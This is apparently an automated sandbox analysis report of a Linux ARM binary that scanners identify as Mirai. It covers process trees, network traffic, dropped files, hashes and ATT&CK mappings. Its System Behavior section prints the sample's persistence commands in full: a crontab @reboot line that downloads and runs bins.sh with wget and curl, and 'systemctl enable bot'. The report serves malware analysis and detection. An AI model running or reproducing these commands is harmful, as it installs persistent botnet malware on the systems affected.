Linux
Analysis Report
armv5l.elf
Overview
General Information
Sample name: | armv5l.elf |
Analysis ID: | 1558938 |
MD5: | 027f2275ef988530da73aa2fd8fddf30 |
SHA1: | 7029a2fc0422cbc11d3a4293b27032f5236c13a9 |
SHA256: | 02ca22fed153f80fad5dfd9d63ed7e1c5afb3afa6a38cba9b7851ec06c8ffd9e |
Tags: | elfuser-abuse_ch |
Infos: |
Detection
Score: | 68 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Classification
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1558938 |
Start date and time: | 2024-11-20 00:56:09 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 46s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultlinuxfilecookbook.jbs |
Analysis system description: | Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11) |
Analysis Mode: | default |
Sample name: | armv5l.elf |
Detection: | MAL |
Classification: | mal68.troj.linELF@0/4@26/0 |
Command: | /tmp/armv5l.elf |
PID: | 5429 |
Exit Code: | 0 |
Exit Code Info: | |
Killed: | False |
Standard Output: | we kinda rocking ngl |
Standard Error: |
- system is lnxubuntu20
- armv5l.elf New Fork (PID: 5431, Parent: 5429)
- armv5l.elf New Fork (PID: 5433, Parent: 5431)
- armv5l.elf New Fork (PID: 5443, Parent: 5431)
- armv5l.elf New Fork (PID: 5445, Parent: 5431)
- armv5l.elf New Fork (PID: 5447, Parent: 5431)
- sh New Fork (PID: 5453, Parent: 5447)
- sh New Fork (PID: 5455, Parent: 5453)
- sh New Fork (PID: 5456, Parent: 5453)
- sh New Fork (PID: 5457, Parent: 5453)
- sh New Fork (PID: 5458, Parent: 5453)
- sh New Fork (PID: 5461, Parent: 5453)
- sh New Fork (PID: 5454, Parent: 5447)
- armv5l.elf New Fork (PID: 5462, Parent: 5431)
- sh New Fork (PID: 5467, Parent: 5462)
- systemd New Fork (PID: 5469, Parent: 5468)
- cleanup
Click to jump to signature section
AV Detection |
---|
Source: | Avira: |
Source: | ReversingLabs: |
Source: | String: | ||
Source: | String: | ||
Source: | String: | ||
Source: | String: | ||
Source: | String: |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | Reads hosts file: | Jump to behavior |
Source: | Socket: | Jump to behavior |
Source: | TCP traffic: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: |
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: |
Source: | .symtab present: |
Source: | Classification label: |
Persistence and Installation Behavior |
---|
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior |
Source: | File written: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | Directory: | Jump to behavior |
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior |
Source: | Chmod executable: | Jump to behavior | ||
Source: | Chmod executable: | Jump to behavior |
Source: | Systemctl executable: | Jump to behavior |
Source: | Queries kernel information via 'uname': | Jump to behavior | ||
Source: | Queries kernel information via 'uname': | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 2 Scripting | Valid Accounts | 1 Scheduled Task/Job | 1 Unix Shell Configuration Modification | 1 Unix Shell Configuration Modification | 1 File and Directory Permissions Modification | OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Systemd Service | 1 Systemd Service | 1 Hidden Files and Directories | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | 1 Scheduled Task/Job | 1 Scheduled Task/Job | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Scripting | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
34% | ReversingLabs | Linux.Trojan.Mirai | ||
100% | Avira | EXP/ELF.Mirai.W |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
ch.archive.ubuntu.com | unknown | unknown | false | high | |
host.zopz-api.com | unknown | unknown | false | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.125.190.26 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
185.125.190.26 | Get hash | malicious | Gafgyt, Mirai, Okiru | Browse | ||
Get hash | malicious | Gafgyt, Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CANONICAL-ASGB | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
|
Process: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
File Type: | |
Category: | dropped |
Size (bytes): | 76 |
Entropy (8bit): | 3.7627880354948586 |
Encrypted: | false |
SSDEEP: | 3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb |
MD5: | D86A1F5765F37989EB0EC3837AD13ECC |
SHA1: | D749672A734D9DEAFD61DCA501C6929EC431B83E |
SHA-256: | 85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45 |
SHA-512: | 338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | /tmp/armv5l.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 178 |
Entropy (8bit): | 4.358630015292201 |
Encrypted: | false |
SSDEEP: | 3:C7exTAXWTHYMOduLWiHSH7zFUbKEVQRFQ4AXWTHYMOduLWiHc:yeGsHPirvFNBjwsHPiL |
MD5: | C3685F292213652676F734AB36C060EE |
SHA1: | 1D05F7F6302EC60E7990DE4BBE9180C149EFC731 |
SHA-256: | D070C429D850B4BAAED03330B6F96C7473ED86D0D33A2FACCD11FB3325767C4C |
SHA-512: | 7AC7D9594C8A4F0160FF9AAE92F7A1EFDFDB933EE3006DCCAC910C79F6FC529AF07B8DF9DAD16E8C21EC3DEF5C5AB9168E4994AE87EDE23E7D4A20F2E7178295 |
Malicious: | true |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | /tmp/armv5l.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 356 |
Entropy (8bit): | 4.9110117370593995 |
Encrypted: | false |
SSDEEP: | 6:z872KstRZAMg8uko4dj2+feGsHPirvFNBjwsHPiFLnLQmWA4Rv:zE2ltRZAXsQ+GGmPirvFNBjwmPipLHW7 |
MD5: | F03C70CD4C61A1852F9E19B8FB0D639C |
SHA1: | A6C078FFFFDF05C4C47B273B24E6B3FF4EF7E008 |
SHA-256: | AE50A3052A395987A2779DEB9253D4AA8638F2F8B1CDA7DF9039388F21BE7A90 |
SHA-512: | 6277FBBFFCDD72FC3712721525538AC07FC46D290EBB02BE34CEF52B3E62BFA8A66F4E834D364D220108C815192E391AD986F05662FCBFAE674417507F4BCC20 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | /usr/bin/crontab |
File Type: | |
Category: | dropped |
Size (bytes): | 235 |
Entropy (8bit): | 5.1026069467163655 |
Encrypted: | false |
SSDEEP: | 6:SUrpqoqQjEOP1KmREJOBFQLvaaqZHGMQ5UYLtCFt3HY8jsHB:8QjHig8maOeHLUHY8mB |
MD5: | DB95B435A973B00CE1461517298C23C1 |
SHA1: | CBD57C4FEE99323B4B3DE15CB4782C2C0B8D6ABD |
SHA-256: | 54F6CAA67C31DF27123C4A108DBD70C7ABCD2C550E627AB1909A2B8091A8A4DA |
SHA-512: | 102B0EF5245E4C3FC333D9805B2B6EE8EBD32656420415AA1E637E2A4C8AE0C8A65EA509F9E24EA7B4B0B9DBDD8129F82476A6AB043E94FD564C1EC6D0CFEB3E |
Malicious: | true |
Reputation: | low |
Preview: |
File type: | |
Entropy (8bit): | 6.150456244954934 |
TrID: |
|
File name: | armv5l.elf |
File size: | 74'600 bytes |
MD5: | 027f2275ef988530da73aa2fd8fddf30 |
SHA1: | 7029a2fc0422cbc11d3a4293b27032f5236c13a9 |
SHA256: | 02ca22fed153f80fad5dfd9d63ed7e1c5afb3afa6a38cba9b7851ec06c8ffd9e |
SHA512: | b770b466a0a3581a42d64beded092c4880a5ec4038834bff7478611bbdf60bb73acafe4a5bee7652a348c89373c88154002b638f88d9e2342cefa989c3fe83a0 |
SSDEEP: | 1536:WbjzMHmZkdEd8rcKt231JG7SN4xLj/o9hgaAKnbpD/:WnzMHmZQL2FklLjYhrA4D/ |
TLSH: | F573E942BD819F03C5C222F6FBEF01993B157B68D5EB3242E925BF9033868DB1967611 |
File Content Preview: | .ELF...a..........(.........4...`!......4. ...(..........................................................f..........Q.td..................................-...L."....=..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S |
ELF header | |
---|---|
Class: | |
Data: | |
Version: | |
Machine: | |
Version Number: | |
Type: | |
OS/ABI: | |
ABI Version: | 0 |
Entry Point Address: | |
Flags: | |
ELF Header Size: | 52 |
Program Header Offset: | 52 |
Program Header Size: | 32 |
Number of Program Headers: | 3 |
Section Header Offset: | 74080 |
Section Header Size: | 40 |
Number of Section Headers: | 13 |
Header String Table Index: | 12 |
Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align |
---|---|---|---|---|---|---|---|---|---|---|
NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0 | 0 | 0 | ||
.init | PROGBITS | 0x8094 | 0x94 | 0x18 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.text | PROGBITS | 0x80b0 | 0xb0 | 0xf7c0 | 0x0 | 0x6 | AX | 0 | 0 | 16 |
.fini | PROGBITS | 0x17870 | 0xf870 | 0x14 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.rodata | PROGBITS | 0x17884 | 0xf884 | 0x1707 | 0x0 | 0x2 | A | 0 | 0 | 4 |
.eh_frame | PROGBITS | 0x18f8c | 0x10f8c | 0x4 | 0x0 | 0x2 | A | 0 | 0 | 4 |
.ctors | PROGBITS | 0x21000 | 0x11000 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.dtors | PROGBITS | 0x21008 | 0x11008 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.jcr | PROGBITS | 0x21010 | 0x11010 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.data | PROGBITS | 0x21014 | 0x11014 | 0x394 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.bss | NOBITS | 0x213a8 | 0x113a8 | 0x630c | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.comment | PROGBITS | 0x0 | 0x113a8 | 0xd60 | 0x0 | 0x0 | 0 | 0 | 1 | |
.shstrtab | STRTAB | 0x0 | 0x12108 | 0x56 | 0x0 | 0x0 | 0 | 0 | 1 |
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings |
---|---|---|---|---|---|---|---|---|---|---|---|
LOAD | 0x0 | 0x8000 | 0x8000 | 0x10f90 | 0x10f90 | 6.1290 | 0x5 | R E | 0x8000 | .init .text .fini .rodata .eh_frame | |
LOAD | 0x11000 | 0x21000 | 0x21000 | 0x3a8 | 0x66b4 | 3.0162 | 0x6 | RW | 0x8000 | .ctors .dtors .jcr .data .bss | |
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x7 | RWE | 0x4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 20, 2024 00:57:08.441629887 CET | 34792 | 53 | 192.168.2.13 | 8.8.8.8 |
Nov 20, 2024 00:57:09.444715023 CET | 34792 | 53 | 192.168.2.13 | 8.8.8.8 |
Nov 20, 2024 00:57:11.464706898 CET | 34792 | 53 | 192.168.2.13 | 8.8.8.8 |
Nov 20, 2024 00:57:12.964732885 CET | 48202 | 443 | 192.168.2.13 | 185.125.190.26 |
Nov 20, 2024 00:57:15.524701118 CET | 34792 | 53 | 192.168.2.13 | 8.8.8.8 |
Nov 20, 2024 00:57:44.196702957 CET | 48202 | 443 | 192.168.2.13 | 185.125.190.26 |
Nov 20, 2024 00:57:55.350265980 CET | 34794 | 53 | 192.168.2.13 | 8.8.8.8 |
Nov 20, 2024 00:57:56.356723070 CET | 34794 | 53 | 192.168.2.13 | 8.8.8.8 |
Nov 20, 2024 00:57:58.372742891 CET | 34794 | 53 | 192.168.2.13 | 8.8.8.8 |
Nov 20, 2024 00:58:02.628869057 CET | 34794 | 53 | 192.168.2.13 | 8.8.8.8 |
Nov 20, 2024 00:58:10.850364923 CET | 34796 | 53 | 192.168.2.13 | 8.8.8.8 |
Nov 20, 2024 00:58:11.877019882 CET | 34796 | 53 | 192.168.2.13 | 8.8.8.8 |
Nov 20, 2024 00:58:13.892999887 CET | 34796 | 53 | 192.168.2.13 | 8.8.8.8 |
Nov 20, 2024 00:58:17.989049911 CET | 34796 | 53 | 192.168.2.13 | 8.8.8.8 |
Nov 20, 2024 00:58:26.350498915 CET | 34798 | 53 | 192.168.2.13 | 8.8.8.8 |
Nov 20, 2024 00:58:27.364891052 CET | 34798 | 53 | 192.168.2.13 | 8.8.8.8 |
Nov 20, 2024 00:58:29.380769968 CET | 34798 | 53 | 192.168.2.13 | 8.8.8.8 |
Nov 20, 2024 00:58:33.604914904 CET | 34798 | 53 | 192.168.2.13 | 8.8.8.8 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 20, 2024 00:57:03.349991083 CET | 50940 | 53 | 192.168.2.13 | 1.1.1.1 |
Nov 20, 2024 00:57:07.302699089 CET | 35177 | 53 | 192.168.2.13 | 1.1.1.1 |
Nov 20, 2024 00:57:12.308908939 CET | 36586 | 53 | 192.168.2.13 | 1.1.1.1 |
Nov 20, 2024 00:57:17.313453913 CET | 42297 | 53 | 192.168.2.13 | 1.1.1.1 |
Nov 20, 2024 00:57:18.600055933 CET | 47809 | 53 | 192.168.2.13 | 1.1.1.1 |
Nov 20, 2024 00:57:22.319196939 CET | 45916 | 53 | 192.168.2.13 | 1.1.1.1 |
Nov 20, 2024 00:57:23.850007057 CET | 58544 | 53 | 192.168.2.13 | 8.8.8.8 |
Nov 20, 2024 00:57:27.321486950 CET | 58339 | 53 | 192.168.2.13 | 1.1.1.1 |
Nov 20, 2024 00:57:29.100042105 CET | 60121 | 53 | 192.168.2.13 | 1.1.1.1 |
Nov 20, 2024 00:57:34.349996090 CET | 55489 | 53 | 192.168.2.13 | 8.8.8.8 |
Nov 20, 2024 00:57:39.600049973 CET | 59225 | 53 | 192.168.2.13 | 1.1.1.1 |
Nov 20, 2024 00:57:44.850020885 CET | 39088 | 53 | 192.168.2.13 | 8.8.8.8 |
Nov 20, 2024 00:57:50.100038052 CET | 45512 | 53 | 192.168.2.13 | 1.1.1.1 |
Nov 20, 2024 00:57:52.327488899 CET | 37934 | 53 | 192.168.2.13 | 1.1.1.1 |
Nov 20, 2024 00:57:57.332869053 CET | 60098 | 53 | 192.168.2.13 | 1.1.1.1 |
Nov 20, 2024 00:58:02.338977098 CET | 39947 | 53 | 192.168.2.13 | 1.1.1.1 |
Nov 20, 2024 00:58:05.600140095 CET | 44371 | 53 | 192.168.2.13 | 1.1.1.1 |
Nov 20, 2024 00:58:07.342664003 CET | 53659 | 53 | 192.168.2.13 | 1.1.1.1 |
Nov 20, 2024 00:58:12.346016884 CET | 46297 | 53 | 192.168.2.13 | 1.1.1.1 |
Nov 20, 2024 00:58:21.100701094 CET | 43513 | 53 | 192.168.2.13 | 1.1.1.1 |
Nov 20, 2024 00:58:36.600176096 CET | 54147 | 53 | 192.168.2.13 | 1.1.1.1 |
Nov 20, 2024 00:58:37.355235100 CET | 58337 | 53 | 192.168.2.13 | 1.1.1.1 |
Nov 20, 2024 00:58:42.358175039 CET | 43788 | 53 | 192.168.2.13 | 1.1.1.1 |
Nov 20, 2024 00:58:47.364419937 CET | 55025 | 53 | 192.168.2.13 | 1.1.1.1 |
Nov 20, 2024 00:58:52.370511055 CET | 58696 | 53 | 192.168.2.13 | 1.1.1.1 |
Nov 20, 2024 00:58:57.374459028 CET | 50732 | 53 | 192.168.2.13 | 1.1.1.1 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Nov 20, 2024 00:57:03.349991083 CET | 192.168.2.13 | 1.1.1.1 | 0xd76d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:07.302699089 CET | 192.168.2.13 | 1.1.1.1 | 0x7cb4 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:12.308908939 CET | 192.168.2.13 | 1.1.1.1 | 0x7cb4 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:17.313453913 CET | 192.168.2.13 | 1.1.1.1 | 0x7cb4 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:18.600055933 CET | 192.168.2.13 | 1.1.1.1 | 0xd76d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:22.319196939 CET | 192.168.2.13 | 1.1.1.1 | 0x7cb4 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:23.850007057 CET | 192.168.2.13 | 8.8.8.8 | 0xd76d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:27.321486950 CET | 192.168.2.13 | 1.1.1.1 | 0x7cb4 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:29.100042105 CET | 192.168.2.13 | 1.1.1.1 | 0xd76d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:34.349996090 CET | 192.168.2.13 | 8.8.8.8 | 0xd76d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:39.600049973 CET | 192.168.2.13 | 1.1.1.1 | 0xd76d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:44.850020885 CET | 192.168.2.13 | 8.8.8.8 | 0xd76d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:50.100038052 CET | 192.168.2.13 | 1.1.1.1 | 0xd76d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:52.327488899 CET | 192.168.2.13 | 1.1.1.1 | 0x5cd5 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:57.332869053 CET | 192.168.2.13 | 1.1.1.1 | 0x5cd5 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:58:02.338977098 CET | 192.168.2.13 | 1.1.1.1 | 0x5cd5 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:58:05.600140095 CET | 192.168.2.13 | 1.1.1.1 | 0xd76d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:58:07.342664003 CET | 192.168.2.13 | 1.1.1.1 | 0x5cd5 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:58:12.346016884 CET | 192.168.2.13 | 1.1.1.1 | 0x5cd5 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:58:21.100701094 CET | 192.168.2.13 | 1.1.1.1 | 0xd76d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:58:36.600176096 CET | 192.168.2.13 | 1.1.1.1 | 0xd76d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:58:37.355235100 CET | 192.168.2.13 | 1.1.1.1 | 0xe658 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:58:42.358175039 CET | 192.168.2.13 | 1.1.1.1 | 0xe658 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:58:47.364419937 CET | 192.168.2.13 | 1.1.1.1 | 0xe658 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:58:52.370511055 CET | 192.168.2.13 | 1.1.1.1 | 0xe658 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:58:57.374459028 CET | 192.168.2.13 | 1.1.1.1 | 0xe658 | Standard query (0) | A (IP address) | IN (0x0001) | false |
System Behavior
Start time (UTC): | 23:57:02 |
Start date (UTC): | 19/11/2024 |
Path: | /tmp/armv5l.elf |
Arguments: | /tmp/armv5l.elf |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 23:57:02 |
Start date (UTC): | 19/11/2024 |
Path: | /tmp/armv5l.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 23:57:02 |
Start date (UTC): | 19/11/2024 |
Path: | /tmp/armv5l.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 23:57:06 |
Start date (UTC): | 19/11/2024 |
Path: | /tmp/armv5l.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 23:57:06 |
Start date (UTC): | 19/11/2024 |
Path: | /tmp/armv5l.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 23:57:06 |
Start date (UTC): | 19/11/2024 |
Path: | /tmp/armv5l.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 23:57:06 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:06 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:06 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:06 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
Start time (UTC): | 23:57:07 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:07 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/bin/chmod |
Arguments: | chmod +x bins.sh |
File size: | 63864 bytes |
MD5 hash: | 739483b900c045ae1374d6f53a86a279 |
Start time (UTC): | 23:57:07 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:07 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/bin/sh |
Arguments: | sh bins.sh |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:07 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:07 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/curl |
Arguments: | /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh |
File size: | 239848 bytes |
MD5 hash: | add6bc2195e82c55985ccf49fd4048e6 |
Start time (UTC): | 23:57:09 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:09 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/bin/chmod |
Arguments: | chmod +x bins.sh |
File size: | 63864 bytes |
MD5 hash: | 739483b900c045ae1374d6f53a86a279 |
Start time (UTC): | 23:57:09 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/bin/sh |
Arguments: | sh bins.sh |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:06 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:06 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/bin/crontab |
Arguments: | crontab - |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
Start time (UTC): | 23:57:09 |
Start date (UTC): | 19/11/2024 |
Path: | /tmp/armv5l.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 23:57:09 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | sh -c "/bin/systemctl enable bot" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:09 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 23:57:09 |
Start date (UTC): | 19/11/2024 |
